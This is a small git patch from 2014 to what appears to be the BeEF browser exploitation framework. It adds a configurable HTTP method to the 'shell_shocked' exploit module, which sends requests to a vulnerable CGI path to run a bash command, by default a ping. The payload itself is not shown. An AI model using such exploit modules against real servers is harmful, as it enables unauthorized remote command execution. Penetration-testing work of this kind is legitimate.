From e8f5c0d2658931967081f96ee085d705abda48ec Mon Sep 17 00:00:00 2001
From: Brendan Coles <bcoles@gmail.com>
Date: Wed, 29 Oct 2014 17:53:22 +0000
Subject: [PATCH] Add HTTP method option

---
 modules/exploits/shell_shocked/command.js | 3 ++-
 modules/exploits/shell_shocked/module.rb  | 1 +
 2 files changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/shell_shocked/command.js b/modules/exploits/shell_shocked/command.js
index b2cfa6f27..8130c55d5 100644
--- a/modules/exploits/shell_shocked/command.js
+++ b/modules/exploits/shell_shocked/command.js
@@ -9,8 +9,9 @@ beef.execute(function () {
     try {
         var target = "<%=@Target%>";
         var command = "<%=@Bash_Command%>";
+        var method = "<%=@method%>";
         var xhr = new XMLHttpRequest();
-        xhr.open("GET", target, true);
+        xhr.open(method, target, true);
         xhr.onload = function () {
         };
         xhr.onreadystatechange = function () {
diff --git a/modules/exploits/shell_shocked/module.rb b/modules/exploits/shell_shocked/module.rb
index d215c3271..4f884ad15 100644
--- a/modules/exploits/shell_shocked/module.rb
+++ b/modules/exploits/shell_shocked/module.rb
@@ -8,6 +8,7 @@ class Shell_shocked < BeEF::Core::Command
   def self.options
     return [
         {'name' => 'Target', 'description' => 'Vulnerable cgi script path', 'ui_label' => 'Target', 'value' => 'http://127.0.0.1/cgi-bin/test.cgi'},
+        { 'name' => 'method', 'ui_label' => 'HTTP Method',  'value' => 'GET' },
         {'name' => 'Bash_Command', 'description' => 'the command to execute', 'ui_label' => 'Bash Command', 'value' => '/bin/ping -c 3 www.google.it'}
     ]
   end